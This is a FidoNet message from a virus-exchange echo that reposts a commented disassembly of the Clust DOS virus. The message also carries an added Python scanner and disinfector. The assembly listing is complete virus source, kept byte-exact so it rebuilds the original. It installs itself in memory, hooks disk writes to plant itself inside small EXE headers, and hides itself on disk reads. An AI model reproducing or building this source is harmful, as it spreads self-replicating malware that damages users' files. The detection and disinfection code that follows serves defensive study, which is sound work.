;─ PVT.VIRII (2:465/65.4) ───────────────────────────────────────── PVT.VIRII ─
; Msg  : 40 of 54
; From : MeteO                              2:5030/136      Tue 09 Nov 93 09:15
; To   : - *.* -                                            Fri 11 Nov 94 08:10
; Subj : CLUST.ASM
;──────────────────────────────────────────────────────────────────────────────
;.RealName: Max Ivanov
;══════════════════════════════════════════════════════════════════════════════
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Information about viruses)
;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48)
;* To   : Daniel Hendry
;* Subj : CLUST.ASM
;══════════════════════════════════════════════════════════════════════════════
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f718.n283!not-for-mail
;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org
;
;Clust Virus from TridenT research group - small but fairly interesting,
;it's one of the more advanced from TridenT that I've seen, with the
;possible exception of the TPE.
;
;This virus goes memory resident at the top of lower memory and hooks
;Int 13h. Whenever an EXE file header is written, it checks to see
;if there is a large field of 0's inside it (VERY common in EXEs)
;and, if so, will put itself inside it and change the EXE marker bytes
;'MZ' to a jump to that code. In this way, it effectively converts the
;file to a COM file when it is run. After this it re-executes the EXE
;file. Because of a stealth handler on Int 13h function 2 (absolute
;disk read) the EXE file is read as it originally was (the handler
;zeros out the field in which it resides and restores the jump to
;'MZ'). Because of the way this virus works, it can only infect
;smaller EXE files.
;
;NOTE:
;Several commands are commented out and have the actual bytes entered
;next to them instead. This is because the compiler that Clust was
;originally compiled on used different translations than mine, and
;I wished to preserve the EXACT virus code.
;Disinfection: Because of this virus' stealth routine, disinfection should
;              be possible simply by Zipping or Arjing all EXE files on an
;              infected disk, then rebooting from a clean disk and unarchiving
;              the files. The original archiving MUST be done while the
;              virus is active in memory. Also - after rebooting - make
;              sure the program you use to unarchive the files is _NOT_
;              infected.
;
;Disassembly by Black Wolf

        .model  tiny
        .code
        org     100h
start:
        jmp     short EntryPoint
LotsaNOPs   db  122 dup (90h)           ; Usually will be EXE header....
OldInt13    dd  0                       ; Saved Int 13h vector; first dword of
                                        ; the 115h-byte body that gets copied
EntryPoint:
        db      0e9h,7ch,0              ; jmp InstallVirus

Int13Handler:
        cmp     ah,3
        je      IsDiskWrite             ; AH=3: absolute sector write
        cmp     ah,2
        jne     GoInt13                 ; anything but read/write passes through
        pushf
        call    cs:OldInt13             ; Call Int 13h
        jc      Exit13Handler           ; Exit on error.
        cmp     word ptr es:[bx],7EEBh  ; Is sector infected? (EB 7E = jmp short)
        jne     Exit13Handler
        mov     word ptr es:[bx],5A4Dh  ; Cover mark with 'MZ'
        push    di cx ax                ; Stealth routine.....
        mov     cx,115h
        xor     ax,ax
        db      89h,0dfh                ; mov di,bx       ; Zero out virus from
        add     di,80h                  ;                 ; sector when it is read.
        rep     stosb
        pop     ax cx di
Exit13Handler:
        iret
GoInt13:
        jmp     cs:[OldInt13]

IsDiskWrite:
        cmp     word ptr es:[bx],5A4Dh  ; Is EXE file being written?
        jne     GoInt13
        cmp     word ptr es:[bx+4],75h  ; Is file too large? (e_cp, 512-byte pages)
        jae     GoInt13
        push    ax cx si di ds
        push    es
        pop     ds
        db      89h,0deh                ; mov si,bx
        add     si,80h                  ; Look in EXE header....
        mov     cx,115h
AllZeros:
        lodsb
        cmp     al,0
        loopz   AllZeros                ; LOOPZ also falls through with CX=0 when
                                        ; only the final byte is non-zero
        cmp     cx,0                    ; Check to see if entire field
        jne     ExitInfectHandler       ; was zeroed - leave if not.
        db      89h,0dfh                ; mov di,bx
        add     di,80h
        mov     cx,115h
        mov     si,offset OldInt13
        push    cs
        pop     ds
        rep     movsb                   ; Copy virus over zero area in EXE header.
        db      89h,0dfh                ; mov di,bx
        mov     ax,7EEBh                ; Stick in Jump over 'MZ'
        stosw
ExitInfectHandler:
        pop     ds di si cx ax          ; Allow Write to process now.
        jmp     short GoInt13

InstallVirus:
        mov     ax,3513h
        int     21h                     ; Get Int 13 address
        mov     word ptr cs:[OldInt13],bx
        mov     word ptr cs:[OldInt13+2],es
        mov     ah,0Dh
        int     21h                     ; Flush disk buffers
        mov     ah,36h
        mov     dl,0
        int     21h                     ; Get free space on default drive
        mov     ax,cs
        dec     ax
        mov     ds,ax                   ; DS = our own MCB (PSP segment - 1)
        cmp     byte ptr ds:0,'Z'       ; Are we the last chain?
        jne     Terminate               ; If not, terminate.
        ;sub    word ptr ds:[3],39h     ; subtract from MCB size
        db      81h,2eh,03,0,39h,0
        ;sub    word ptr ds:[12h],39h   ; subtract from PSP TopOfMem
        db      81h,2eh,12h,0,39h,0
        mov     si,offset OldInt13
        db      89h,0f7h                ; mov di,si
        mov     es,ds:[12h]             ; ES = new segment
        push    cs
        pop     ds
        mov     cx,115h                 ; Copy virus into memory
        rep     movsb
        mov     ax,2513h
        push    es
        pop     ds
        mov     dx,offset Int13Handler
        int     21h                     ; Set int 13 to virus handler
        mov     ah,4Ah
        push    cs
        pop     es
        mov     bx,39h
        int     21h                     ; Modify mem alloc.
        push    cs
        pop     ds
        mov     bx,ds:[2ch]             ; Get environment segment
        mov     es,bx
        xor     ax,ax
        mov     di,1
ScanForFilename:                        ; Find name of file executed
        dec     di                      ; in environment strings...
        scasw                           ; (located after two 0's)
        jnz     ScanForFilename
        lea     si,[di+2]
        push    bx
        pop     ds                      ; DS = environment segment
        push    cs
        pop     es                      ; ES = code segment
        mov     di,offset Filename
        push    di
        xor     bx,bx
CopyFilename:
        mov     cx,50h
        inc     bx
        lodsb
        cmp     al,0
        jne     StoreFilename           ; Change zero at end of
        mov     al,0Dh                  ; filename to a return
StoreFilename:
        stosb
        cmp     al,0Dh                  ; If it was a return, we're
        loopnz  CopyFilename            ; done copying the filename
        mov     byte ptr ds:[28fh],bl
        push    cs
        pop     ds
        pop     si
        dec     si
        int     2Eh                     ; Re-execute EXE file with
                                        ; Stealth handler in memory,
                                        ; so Exe is run w/o virus.
Terminate:
        mov     ah,4Ch
        int     21h
        db      0
Filename    db  1
        end     start

;-+- Terminate 1.50/Pro
; + Origin: Fred's Place (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;                                   ■ The MeteO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: ∙PVT.ViRII·main·board· / Virus Research labs. (2:5030/136)
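What the post's archive-and-reboot disinfection does implicitly can be done directly on a file's first sector. The following is an added example in Python, not code from the post, from Black Wolf or from TridenT: it reproduces the write hook's infection test (the 'MZ' check, the e_cp < 75h size check and the AllZeros loop) and the read hook's stealth transformation (put 'MZ' back, zero 115h bytes at offset 80h), which is all a disinfector needs because the virus only ever overwrote a field that was zero. The constants are taken from the listing; the sample sectors, the `make_sample_sector` helper and the `FAKE_BODY` stand-in for the resident image are constructed for the demo. It goes one step beyond the text by modelling the LOOPZ exit condition exactly, so the scanner agrees with the virus about a field whose only non-zero byte is the last one.

```python
"""Clust first-sector scanner/disinfector (added example, not TridenT's or the
poster's code).  Constants come from the disassembly in the message above."""

MZ_MAGIC = b"MZ"             # 5A4Dh as a little-endian word
CLUST_MARK = b"\xEB\x7E"     # 7EEBh: 'jmp short' written over 'MZ' on infection
BODY_OFFSET = 0x80           # rep movsb target: bx+80h
BODY_LEN = 0x115             # rep movsb / rep stosb count
MAX_PAGES = 0x75             # e_cp (word at offset 4) must be below this
SECTOR = 512                 # Int 13h works on whole sectors


def _clust_zero_check(sector: bytes) -> bool:
    """Replicates the AllZeros loop: lodsb / cmp al,0 / loopz, then cmp cx,0.
    LOOPZ stops when CX reaches zero regardless of ZF, so a field whose only
    non-zero byte is the last one is still accepted.  Kept on purpose so the
    scanner classifies exactly the files the virus would have infected."""
    cx = BODY_LEN
    for b in sector[BODY_OFFSET:BODY_OFFSET + BODY_LEN]:
        cx -= 1
        if cx == 0 or b != 0:     # loopz falls through here
            break
    return cx == 0                # 'cmp cx,0 / jne ExitInfectHandler'


def classify(sector: bytes) -> str:
    """'infected', 'infectable' or 'clean' for the first sector of a file."""
    if len(sector) < BODY_OFFSET + BODY_LEN:
        return "clean"                        # cannot hold the body at all
    if sector[:2] == CLUST_MARK:
        return "infected"                     # what the read hook looks for
    if sector[:2] != MZ_MAGIC:
        return "clean"                        # write hook only looks at 'MZ'
    e_cp = int.from_bytes(sector[4:6], "little")
    if e_cp >= MAX_PAGES:                     # 'jae GoInt13'
        return "clean"
    return "infectable" if _clust_zero_check(sector) else "clean"


def apply_write_hook(sector: bytes, body: bytes) -> bytes:
    """Models the Int 13h/03h hook on an in-memory sector: used here only to
    build test data.  `body` stands in for the 115h-byte resident image, which
    this example does not contain."""
    if classify(sector) != "infectable" or len(body) != BODY_LEN:
        return sector
    return CLUST_MARK + sector[2:BODY_OFFSET] + body + sector[BODY_OFFSET + BODY_LEN:]


def disinfect(sector: bytes) -> bytes:
    """Same transformation the Int 13h/02h stealth hook applies on read:
    restore 'MZ' and zero the body.  Exact because the field was all zero
    before infection (the LOOPZ quirk byte is also zero in the stealthed
    view, so the running system never saw it either)."""
    if sector[:2] != CLUST_MARK:
        return sector
    return (MZ_MAGIC + sector[2:BODY_OFFSET]
            + bytes(BODY_LEN) + sector[BODY_OFFSET + BODY_LEN:])


def make_sample_sector(pages: int, field: bytes = b"") -> bytes:
    """Constructed first sector of a small DOS EXE (sample data, not a real file).
    `field` is written at 80h to control what the AllZeros loop sees."""
    sec = bytearray(SECTOR)
    sec[0:2] = MZ_MAGIC
    sec[4:6] = pages.to_bytes(2, "little")       # e_cp: 512-byte pages in file
    sec[0x18:0x1A] = (0x1C).to_bytes(2, "little")  # e_lfarlc: relocation table offset
    sec[BODY_OFFSET:BODY_OFFSET + len(field)] = field
    return bytes(sec)


# Stand-in for the resident image copied by 'rep movsb' (constructed, 115h bytes).
FAKE_BODY = bytes(range(256)) + bytes(BODY_LEN - 256)


def scan_file(path: str) -> str:
    """Classify a file on disk from its first sector.  Run this from a clean
    boot: under the resident virus every read goes through the stealth hook
    and an infected file already comes back looking clean."""
    with open(path, "rb") as fh:
        return classify(fh.read(SECTOR))


if __name__ == "__main__":
    clean = make_sample_sector(0x10)
    infected = apply_write_hook(clean, FAKE_BODY)
    print(classify(clean), classify(infected), disinfect(infected) == clean)
```

The scanner deliberately answers "infectable" as well as "infected": on a disk where the virus was resident, the set of small EXEs with a zero field at 80h is the set of files worth re-checking after the clean reboot.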